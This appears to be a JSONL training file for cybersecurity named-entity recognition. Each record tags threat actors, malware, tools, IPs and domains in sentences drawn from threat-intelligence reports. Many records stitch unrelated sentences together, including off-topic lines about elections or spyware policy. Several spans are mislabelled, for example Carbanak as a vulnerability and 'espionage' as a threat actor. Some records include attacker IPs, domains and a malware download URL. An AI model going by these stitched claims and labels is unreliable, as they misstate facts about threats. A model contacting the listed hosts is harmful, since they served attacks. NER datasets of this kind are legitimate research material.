{"text": "We have seen two types of apps that use this custom-made SDK . Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB . ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi , and is capable of performing file uploads and downloads , file execution , and process and directory listings . Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties ?", "spans": {"ORGANIZATION: bank": [[101, 105]], "ORGANIZATION: Group-IB": [[161, 169]], "MALWARE: ELMER": [[172, 177]], "TOOL: Delphi": [[235, 241]]}, "info": {"id": "cyberner_stix_train_001322", "source": "cyberner_stix_train"}}
{"text": "Cannon has not been previously observed in use by the Sofacy group and contains a novel email-based C2 communication channel .", "spans": {"MALWARE: Cannon": [[0, 6]], "THREAT_ACTOR: Sofacy": [[54, 60]], "TOOL: C2": [[100, 102]]}, "info": {"id": "cyberner_stix_train_001323", "source": "cyberner_stix_train"}}
{"text": "It has been shortened for brevity . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 – 2013 . The webmail addresses , while unknown , were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted . Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": {"ORGANIZATION: Kaspersky Lab": [[49, 62]], "TOOL: emails": [[326, 332]], "ORGANIZATION: Apple": [[349, 354]], "VULNERABILITY: exploited vulnerability": [[439, 462]], "ORGANIZATION: WebKit": [[466, 472]]}, "info": {"id": "cyberner_stix_train_001324", "source": "cyberner_stix_train"}}
{"text": "executes netwf.dll netwf.dll :", "spans": {"FILEPATH: netwf.dll": [[9, 18], [19, 28]]}, "info": {"id": "cyberner_stix_train_001325", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //sagawa-reg [ . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others . This campaign originally came in via phishing emails that contained an attached Word document with embedded macros , Carbon Black located roughly 180 variants in the wild . Problems also arise when organizations turn a blind eye to the usage of commercial spyware .", "spans": {"THREAT_ACTOR: Sofacy group": [[44, 56]], "TOOL: CORESHELL": [[127, 136]], "TOOL: SPLM": [[139, 143]], "TOOL: Xagent": [[150, 156]], "TOOL: CHOPSTICK": [[163, 172]], "TOOL: JHUHUGIT": [[177, 185]], "TOOL: Carberp": [[222, 229]], "TOOL: AZZY": [[242, 246]], "TOOL: EVILTOSS": [[277, 285]], "TOOL: Word document": [[422, 435]], "ORGANIZATION: Carbon Black": [[459, 471]], "ORGANIZATION: organizations": [[540, 553]]}, "info": {"id": "cyberner_stix_train_001326", "source": "cyberner_stix_train"}}
{"text": "There is no doubt that BitPaymer ransomware operations are proving successful for this criminal group , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan . The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques .", "spans": {"TOOL: BitPaymer": [[23, 32]], "TOOL: ransomware": [[33, 43]], "TOOL: Dridex banking trojan": [[249, 270]], "MALWARE: Enfal Trojan": [[295, 307]]}, "info": {"id": "cyberner_stix_train_001327", "source": "cyberner_stix_train"}}
{"text": "The Trojan also registered in Google Cloud Messaging ( GCM ) , meaning it could then receive commands via that service . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America .", "spans": {"SYSTEM: Google Cloud Messaging ( GCM )": [[30, 60]], "MALWARE: 32-bit Windows executable file": [[166, 196]], "TOOL: Remote Access Trojan": [[215, 235]], "TOOL: RAT": [[238, 241]], "THREAT_ACTOR: Lazarus": [[279, 286]], "ORGANIZATION: Trend Micro": [[337, 348]], "MALWARE: BKDR_BINLODR.ZNFJ-A": [[352, 371]], "ORGANIZATION: financial institutions": [[399, 421]]}, "info": {"id": "cyberner_stix_train_001328", "source": "cyberner_stix_train"}}
{"text": "Given this requirement , SilverTerrier actors often rely on Dynamic DNS and virtual private servers to provide a layer of obfuscation to protect their identities . Turla is a notorious group that has been targeting diplomats .", "spans": {"THREAT_ACTOR: SilverTerrier actors": [[25, 45]], "TOOL: Dynamic DNS": [[60, 71]], "TOOL: virtual private servers": [[76, 99]], "THREAT_ACTOR: Turla": [[164, 169]], "ORGANIZATION: diplomats": [[215, 224]]}, "info": {"id": "cyberner_stix_train_001329", "source": "cyberner_stix_train"}}
{"text": "In addition to using several publicly known injection methods to perform this task , it also takes advantage of an obscure operating system feature known as hot patching . Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries .", "spans": {"ORGANIZATION: Kaspersky Lab": [[178, 191]], "MALWARE: NetTraveler": [[249, 260]]}, "info": {"id": "cyberner_stix_train_001330", "source": "cyberner_stix_train"}}
{"text": "Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . The malware will install two proxies running on local host port 5555 and 5588 .", "spans": {"ORGANIZATION: government organizations": [[22, 46]], "ORGANIZATION: information technology services": [[60, 91]], "ORGANIZATION: government": [[101, 111]], "TOOL: proxies": [[176, 183]]}, "info": {"id": "cyberner_stix_train_001331", "source": "cyberner_stix_train"}}
{"text": "Upgrade PowerShell to new versions with enhanced logging features and monitor the logs to detect usage of PowerShell commands , which are often malware-related .", "spans": {"TOOL: PowerShell": [[8, 18], [106, 116]]}, "info": {"id": "cyberner_stix_train_001332", "source": "cyberner_stix_train"}}
{"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services .", "spans": {"MALWARE: Canhadr/Ndriver": [[29, 44]], "MALWARE: Metel": [[251, 256]], "ORGANIZATION: banking": [[262, 269]], "MALWARE: Trojan": [[270, 276]], "MALWARE: Corkow": [[293, 299]]}, "info": {"id": "cyberner_stix_train_001333", "source": "cyberner_stix_train"}}
{"text": ") , and less screen real estate for victims to identify potential indicators of a threat . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 . Among the archiving tools we tried, WinRar 3.30 behaved differently and . It has two components Loader and core module .", "spans": {"THREAT_ACTOR: Lazarus Group": [[95, 108]], "ORGANIZATION: Novetta": [[133, 140]], "TOOL: WinRar": [[228, 234]]}, "info": {"id": "cyberner_stix_train_001334", "source": "cyberner_stix_train"}}
{"text": "The threat actors saved both the SYSTEM file ( system.hive ) and NTDS.dit in the compromised host's c:\\windows\\temp directory .", "spans": {"FILEPATH: system.hive": [[47, 58]], "FILEPATH: NTDS.dit": [[65, 73]]}, "info": {"id": "cyberner_stix_train_001335", "source": "cyberner_stix_train"}}
{"text": "How do you know if your Google account is breached ? APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . opaque predicates pattern matching functions are called . Mandiant first observed the self - proclaimed hacktivist group calling itself \" Anonymous Sudan \" in January 2023 and the group soon after declared allegiance to KillNet .", "spans": {"ORGANIZATION: Google": [[24, 30]], "THREAT_ACTOR: APT38": [[53, 58]], "ORGANIZATION: banks": [[104, 109]], "ORGANIZATION: financial institutions": [[120, 142]], "ORGANIZATION: Mandiant": [[263, 271]], "THREAT_ACTOR: Anonymous Sudan": [[343, 358]]}, "info": {"id": "cyberner_stix_train_001336", "source": "cyberner_stix_train"}}
{"text": "The below code snippet is currently isolated and dormant . In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected . Some of them exploit CVE-2017-0199 , loading it using VBS and PowerShell scripts and then installing customized versions of RevengeRAT , NjRAT , NanoCoreRAT , 888 RAT and other custom malware such as ProCC in the victim ’s machine . For those who fall outside of that demographic , it ’s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": {"TOOL: Corkow": [[104, 110]], "THREAT_ACTOR: Metel": [[113, 118]], "VULNERABILITY: CVE-2017-0199": [[164, 177]], "TOOL: PowerShell": [[205, 215]], "MALWARE: RevengeRAT": [[267, 277]], "MALWARE: NjRAT": [[280, 285]], "MALWARE: NanoCoreRAT": [[288, 299]], "MALWARE: 888 RAT": [[302, 309]], "MALWARE: ProCC": [[343, 348]], "TOOL: Microsoft": [[522, 531]]}, "info": {"id": "cyberner_stix_train_001337", "source": "cyberner_stix_train"}}
{"text": "The attack wave started in late July 2011 and continued into midSeptember 2011 .", "spans": {}, "info": {"id": "cyberner_stix_train_001338", "source": "cyberner_stix_train"}}
{"text": "The HTA ’s VBScript changes the window size and location and then uses PowerShell to download yet another script : power.ps1 .", "spans": {"TOOL: HTA": [[4, 7]], "TOOL: VBScript": [[11, 19]], "SYSTEM: window": [[32, 38]], "TOOL: PowerShell": [[71, 81]], "FILEPATH: power.ps1": [[115, 124]]}, "info": {"id": "cyberner_stix_train_001339", "source": "cyberner_stix_train"}}
{"text": "The adware functionality is the same in all the apps we analyzed . Kaspersky also observed some activity from Gaza Team and MuddyWater . Here is the complete list of files internally used by the RAT: error.tmp (the log file of the keylogger) tedsul.ocx helpsol.ocx trepsl.ocx psltred.ocx solhelp.ocx sulted.ocx .", "spans": {"ORGANIZATION: Kaspersky": [[67, 76]], "THREAT_ACTOR: MuddyWater": [[124, 134]], "FILEPATH: error.tmp": [[200, 209]], "FILEPATH: tedsul.ocx": [[242, 252]], "FILEPATH: helpsol.ocx": [[253, 264]], "FILEPATH: trepsl.ocx": [[265, 275]], "FILEPATH: psltred.ocx": [[276, 287]], "FILEPATH: solhelp.ocx": [[288, 299]], "FILEPATH: sulted.ocx": [[300, 310]]}, "info": {"id": "cyberner_stix_train_001340", "source": "cyberner_stix_train"}}
{"text": "Generally , after an application gets banned from an official app store , such as Google Play , users try to find alternative ways to download the app . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . The library used to hide Winnti ’s system activity is a copy of the open-source userland rootkit Azazel , with minor changes .", "spans": {"SYSTEM: Google Play": [[82, 93]], "THREAT_ACTOR: Lazarus group": [[279, 292]], "MALWARE: Winnti": [[373, 379]], "TOOL: Azazel": [[445, 451]]}, "info": {"id": "cyberner_stix_train_001341", "source": "cyberner_stix_train"}}
{"text": "The DLL side-loaded stage 4 malware mimicking a real export table to avoid detection Stage 4 : The memory loader – Fun injection with GDI function hijacking Depending on how stage 4 was launched , two different things may happen : In the low-integrity case ( under UAC ) the installer simply injects the stage 5 malware into the bogus explorer.exe process started earlier and terminates In the high-integrity case ( with administrative privileges or after UAC bypass ) , the code searches for the process hosting the Plug and Play service ( usually svchost.exe SecureWorks® Counter Threat Unit™ ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 . Finally , the loader will decrypt the payload to a memory buffer and overwrite the previously found return address with the pointer to that buffer , ensuring that the malicious shellcode will be executed when the DLL attempts to return to the caller . Examples of indicators of attack , and why they matter", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[561, 594]], "ORGANIZATION: CTU": [[597, 600]], "ORGANIZATION: organization": [[675, 687]], "TOOL: DLL": [[925, 928]]}, "info": {"id": "cyberner_stix_train_001342", "source": "cyberner_stix_train"}}
{"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": {"ORGANIZATION: high-tech": [[13, 22]], "ORGANIZATION: manufacturing": [[27, 40]], "THREAT_ACTOR: DragonOK": [[74, 82]], "ORGANIZATION: economic": [[132, 140]]}, "info": {"id": "cyberner_stix_train_001343", "source": "cyberner_stix_train"}}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "MALWARE: XBOW": [[199, 203]], "MALWARE: BIFROSE": [[237, 244]], "MALWARE: KIVARS": [[249, 255]]}, "info": {"id": "cyberner_stix_train_001344", "source": "cyberner_stix_train"}}
{"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Daserf malware": [[96, 110]], "VULNERABILITY: Flash exploits": [[136, 150]], "MALWARE: Epic Turla": [[190, 200]], "ORGANIZATION: pharmaceutical companies": [[292, 316]]}, "info": {"id": "cyberner_stix_train_001345", "source": "cyberner_stix_train"}}
{"text": "With their gaps in visibility , these organizations can have a very difficult time distinguishing adversary activity from that of legitimate users , pushing detection times out to weeks , months , or even years .", "spans": {}, "info": {"id": "cyberner_stix_train_001346", "source": "cyberner_stix_train"}}
{"text": "FURTHER READING New type of auto-rooting Android adware is nearly impossible to remove Researchers from security firm Check Point Software said the malware installs more than 50,000 fraudulent apps each day , displays 20 million malicious advertisements , and generates more than $ 300,000 per month in revenue . Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks—such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank—in recent history . APT33 : 95.211.191.117 update-sec.com . None DGA Formula The algorithm for generating domains has been updated and includes the TLDs toplevel domains of .space , .net , .dynu.net , and .top to evade detection of security vendors using the previously published DGA domain generation algorithm", "spans": {"SYSTEM: Android": [[41, 48]], "ORGANIZATION: Check Point Software": [[118, 138]], "ORGANIZATION: government": [[416, 426]], "THREAT_ACTOR: threat actors": [[435, 448]], "THREAT_ACTOR: APT33": [[650, 655]], "IP_ADDRESS: 95.211.191.117": [[658, 672]], "DOMAIN: update-sec.com": [[673, 687]]}, "info": {"id": "cyberner_stix_train_001347", "source": "cyberner_stix_train"}}
{"text": "Both apps shared the same C & C server , but we couldn ’ t investigate the latter as it had already been removed from the Google Play store . One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network . Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 .", "spans": {"SYSTEM: Google Play store": [[122, 139]], "THREAT_ACTOR: Waterbug’s": [[200, 210]], "THREAT_ACTOR: Waterbug": [[294, 302]], "THREAT_ACTOR: group": [[364, 369]], "MALWARE: Proxysvc": [[547, 555]], "MALWARE: Destover": [[584, 592]]}, "info": {"id": "cyberner_stix_train_001348", "source": "cyberner_stix_train"}}
{"text": "First , they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours .", "spans": {"TOOL: COM": [[17, 20]]}, "info": {"id": "cyberner_stix_train_001349", "source": "cyberner_stix_train"}}
{"text": "Malware authors in the past have often coded a “ safety net ” into their malware to prevent them from accidentally infecting their own computers and devices . The Gamaredon Group primarily makes use of compromised domains , dynamic DNS providers , Russian and Ukrainian country code top-level domains ( ccTLDs ) , and Russian hosting providers to distribute their custom-built malware . and so on ) This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[163, 178]], "ORGANIZATION: dynamic DNS providers": [[224, 245]], "ORGANIZATION: hosting providers": [[326, 343]], "TOOL: custom-built malware": [[364, 384]], "VULNERABILITY: server - side request forgery ( SSRF )": [[440, 478]]}, "info": {"id": "cyberner_stix_train_001350", "source": "cyberner_stix_train"}}
{"text": "As mentioned in our previous blogs on DealersChoice , the payload of choice for previous variants was SofacyCarberp ( Seduploader ) , but we have no evidence to suggest this tool was used in this attack .", "spans": {"TOOL: DealersChoice": [[38, 51]], "MALWARE: SofacyCarberp": [[102, 115]], "MALWARE: Seduploader": [[118, 129]]}, "info": {"id": "cyberner_stix_train_001351", "source": "cyberner_stix_train"}}
{"text": "By accessing and stealing this data , Eventbot has the potential to access key business data , including financial data . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"MALWARE: Eventbot": [[38, 46]], "ORGANIZATION: Trend Micro": [[165, 176]], "MALWARE: espionage toolkit": [[226, 243]], "TOOL: KeyBoy": [[324, 330]], "THREAT_ACTOR: actors": [[364, 370]], "ORGANIZATION: individual": [[405, 415]]}, "info": {"id": "cyberner_stix_train_001352", "source": "cyberner_stix_train"}}
{"text": "Successfully evicting TG-3390 from an environment requires a coordinated plan to remove all access points , including remote access tools and web shells .", "spans": {"THREAT_ACTOR: TG-3390": [[22, 29]], "TOOL: remote access tools": [[118, 137]], "TOOL: web shells": [[142, 152]]}, "info": {"id": "cyberner_stix_train_001353", "source": "cyberner_stix_train"}}
{"text": "As soon as the victim tries to log in , it stores the victim 's credentials in /storage/0/DCIM/.fdat Facebook Login Figure 7 : Fake Facebook login The second command is IODBSSUEEZ , which further sends stolen credentials to the C & C server , as seen in Figure 8 . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . They compromised various banking systems , including the Russian Central Bank 's Automated Workstation Client , ATMs , and card processing .", "spans": {"SYSTEM: Facebook": [[101, 109], [132, 140]], "MALWARE: Bemstour": [[293, 301]], "MALWARE: Pirpi": [[332, 337]], "MALWARE: backdoor": [[338, 346]], "TOOL: different": [[406, 415]], "TOOL: backdoor": [[416, 424]]}, "info": {"id": "cyberner_stix_train_001354", "source": "cyberner_stix_train"}}
{"text": "These will be executed in a WebView object created by the trojan . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions .", "spans": {"THREAT_ACTOR: APT38": [[235, 240]], "ORGANIZATION: financial institutions": [[301, 323]]}, "info": {"id": "cyberner_stix_train_001355", "source": "cyberner_stix_train"}}
{"text": "Additionally , rootdaemon attempts to remove its own power usage statistics from Huawei phones ' SystemManager : Similarly , the malicious application probably attempts to minimize traces on Samsung phones by adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/apm_sp_status_of_apps.xml the following lines : And adding to the file /data/data/com.samsung.android.securitylogagent/shared_prefs/com.samsung.android.securitylogagent_preferences.xml For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . JhoneRAT : https://drive.google.com/uc?export=downloadid=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd . Money", "spans": {"ORGANIZATION: Huawei": [[81, 87]], "ORGANIZATION: Samsung": [[191, 198]], "THREAT_ACTOR: Sowbug": [[508, 514]], "TOOL: Felismus backdoor": [[567, 584]], "MALWARE: adobecms.exe": [[644, 656]], "MALWARE: CSIDL_WINDOWS\\debug": [[660, 679]], "MALWARE: JhoneRAT": [[682, 690]], "DOMAIN: https://drive.google.com/uc?export=downloadid=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd": [[693, 772]]}, "info": {"id": "cyberner_stix_train_001356", "source": "cyberner_stix_train"}}
{"text": "Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures .", "spans": {"MALWARE: HttpBrowser": [[24, 35]]}, "info": {"id": "cyberner_stix_train_001357", "source": "cyberner_stix_train"}}
{"text": "The final part of the VBA script changes the properties of these two files , setting their attributes to Hidden .", "spans": {"TOOL: VBA": [[22, 25]]}, "info": {"id": "cyberner_stix_train_001358", "source": "cyberner_stix_train"}}
{"text": "For persistence , the loader will write the path to this batch file to the following registry key .", "spans": {}, "info": {"id": "cyberner_stix_train_001359", "source": "cyberner_stix_train"}}
{"text": "Intrigued , we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices . FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors . This tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13 . In October 2019 , ESET published “ Operation Ghost ” detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": {"TOOL: FALLCHILL": [[156, 165]], "TOOL: HIDDEN COBRA malware": [[220, 240]], "THREAT_ACTOR: HIDDEN COBRA actors": [[321, 340]], "ORGANIZATION: ESET": [[456, 460]], "THREAT_ACTOR: Dukes": [[534, 539]], "MALWARE: PolyglotDuke": [[552, 564]], "MALWARE: RegDuke": [[567, 574]], "MALWARE: FatDuke": [[579, 586]]}, "info": {"id": "cyberner_stix_train_001360", "source": "cyberner_stix_train"}}
{"text": "Most of the additional samples were the Delphi and AutoIT variants as reported by ESET .", "spans": {"TOOL: Delphi": [[40, 46]], "TOOL: AutoIT": [[51, 57]], "ORGANIZATION: ESET": [[82, 86]]}, "info": {"id": "cyberner_stix_train_001361", "source": "cyberner_stix_train"}}
{"text": "] com http : //www.adsuperiorstore [ . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 .", "spans": {"VULNERABILITY: Carbanak": [[39, 47]], "TOOL: Carberp": [[90, 97]], "THREAT_ACTOR: espionage": [[115, 124]], "THREAT_ACTOR: Seedworm": [[223, 231]], "THREAT_ACTOR: MuddyWater": [[238, 248]]}, "info": {"id": "cyberner_stix_train_001362", "source": "cyberner_stix_train"}}
{"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies .", "spans": {"THREAT_ACTOR: Cleaver": [[38, 45]], "THREAT_ACTOR: Cyber Army": [[99, 109]], "THREAT_ACTOR: Ashiyane": [[124, 132]], "ORGANIZATION: Syrian Electronic Army": [[155, 177]], "ORGANIZATION: High-Tech": [[332, 341]], "ORGANIZATION: Cyber Security Companies": [[346, 370]]}, "info": {"id": "cyberner_stix_train_001363", "source": "cyberner_stix_train"}}
{"text": "The embedded app appears to be a media player . APT41 has targeted organizations in 14 countries (and Hong Kong) over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics .", "spans": {"THREAT_ACTOR: APT41": [[48, 53]], "THREAT_ACTOR: actors": [[489, 495]]}, "info": {"id": "cyberner_stix_train_001364", "source": "cyberner_stix_train"}}
{"text": "Some of the CozyDuke spear-phishing emails from early July posed as e-fax arrival notifications , a popular theme for spam emails , and used the same “ US letter fax test page ” decoy document that was used a year later by CloudDuke .", "spans": {"MALWARE: CozyDuke": [[12, 20]], "TOOL: emails": [[36, 42], [123, 129]], "TOOL: e-fax": [[68, 73]], "TOOL: fax": [[162, 165]], "MALWARE: CloudDuke": [[223, 232]]}, "info": {"id": "cyberner_stix_train_001365", "source": "cyberner_stix_train"}}
{"text": "Drive-by downloads and multiple rooting exploits The malware uses a variety of methods to infect devices . We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia . APT33 : 64.251.19.216 srvhost.servehttp.com . The next step is to collect some information about the victim system to send them to the C2 server .", "spans": {"ORGANIZATION: BAE Systems": [[216, 227]], "THREAT_ACTOR: APT33": [[256, 261]], "IP_ADDRESS: 64.251.19.216": [[264, 277]], "DOMAIN: srvhost.servehttp.com": [[278, 299]], "SYSTEM: C2 server": [[391, 400]]}, "info": {"id": "cyberner_stix_train_001366", "source": "cyberner_stix_train"}}
{"text": "The threat actors have used discrete infrastructure clusters that share matching hosting and registration characteristics .", "spans": {}, "info": {"id": "cyberner_stix_train_001367", "source": "cyberner_stix_train"}}
{"text": "You can find a full list with short descriptions in the Appendix . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations , and has also targeted European and North American nations .", "spans": {"THREAT_ACTOR: NewsBeef": [[95, 103]], "THREAT_ACTOR: MuddyWater": [[271, 281]]}, "info": {"id": "cyberner_stix_train_001368", "source": "cyberner_stix_train"}}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "MALWARE: Corkow": [[224, 230]]}, "info": {"id": "cyberner_stix_train_001369", "source": "cyberner_stix_train"}}
{"text": "Our research team was able to identify several instances of this activity by cross-referencing data from breached devices with Google Play app reviews . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . the variable v2 in pseudocode is a register operand ( ecx ) WarDefense extrinsic In the 21st century it would be irresponsible to ignore the fact that nation states and even patriot hackers play in either initiating or defending against adversaries .", "spans": {"SYSTEM: Google Play": [[127, 138]], "THREAT_ACTOR: REDBALDKNIGHT": [[163, 176]], "MALWARE: decoy documents": [[257, 272]], "THREAT_ACTOR: patriot hackers": [[487, 502]], "THREAT_ACTOR: adversaries": [[550, 561]]}, "info": {"id": "cyberner_stix_train_001370", "source": "cyberner_stix_train"}}
{"text": "Microsoft Defender for Endpoint on Android further enriches organizations ’ visibility into malicious activity , empowering them to comprehensively prevent , detect , and respond to against attack sprawl and cross-domain incidents . The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 . Occasionally, we encounter some clever and creative ways these malicious archives are . CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives .", "spans": {"SYSTEM: Microsoft Defender": [[0, 18]], "SYSTEM: Android": [[35, 42]], "THREAT_ACTOR: Ke3chang": [[237, 245]], "THREAT_ACTOR: attackers": [[246, 255]], "TOOL: MyWeb": [[273, 278]], "MALWARE: CADDYWIPER": [[404, 414]]}, "info": {"id": "cyberner_stix_train_001371", "source": "cyberner_stix_train"}}
{"text": "If rooting is successful , the attacker has full control of the device and can execute privileged commands remotely . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" . In the following example , US by the numbers", "spans": {"THREAT_ACTOR: hacker group": [[137, 149]], "THREAT_ACTOR: BlackOasis": [[178, 188]]}, "info": {"id": "cyberner_stix_train_001372", "source": "cyberner_stix_train"}}
{"text": "Admin panel The administration panel shows the application configuration , which matches the commands from the C2 . We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools . To achieve this , the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation . For the latest protection updates , please visit the Symantec Protection Bulletin .", "spans": {"THREAT_ACTOR: APT10": [[138, 143]], "ORGANIZATION: Symantec": [[490, 498]]}, "info": {"id": "cyberner_stix_train_001373", "source": "cyberner_stix_train"}}
{"text": "If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants .", "spans": {"TOOL: xlsm file": [[38, 47]], "MALWARE: it": [[50, 52]], "MALWARE: DNS tunneling": [[224, 237]]}, "info": {"id": "cyberner_stix_train_001374", "source": "cyberner_stix_train"}}
{"text": "These results indicated that the threat actors leveraged the Altiris management platform installed at the client site , along with compromised domain credentials associated with the Altiris system , to move laterally within the compromised environment .", "spans": {"TOOL: Altiris": [[61, 68], [182, 189]]}, "info": {"id": "cyberner_stix_train_001375", "source": "cyberner_stix_train"}}
{"text": "For the victims deemed interesting enough , the Dukes would then deploy a different toolset .", "spans": {"THREAT_ACTOR: Dukes": [[48, 53]]}, "info": {"id": "cyberner_stix_train_001376", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //www [ . As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 . For this post the following sample was analyzed . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": {"TOOL: Cannon tool": [[72, 83]], "THREAT_ACTOR: Sofacy group": [[90, 102]], "THREAT_ACTOR: Fancy Bear": [[109, 119]], "THREAT_ACTOR: APT28": [[122, 127]], "THREAT_ACTOR: STRONTIUM": [[130, 139]], "THREAT_ACTOR: Pawn Storm": [[142, 152]], "THREAT_ACTOR: Sednit": [[155, 161]], "ORGANIZATION: government": [[198, 208]], "THREAT_ACTOR: LockBit": [[352, 359]], "ORGANIZATION: US organizations": [[406, 422]], "ORGANIZATION: CISA": [[492, 496]]}, "info": {"id": "cyberner_stix_train_001377", "source": "cyberner_stix_train"}}
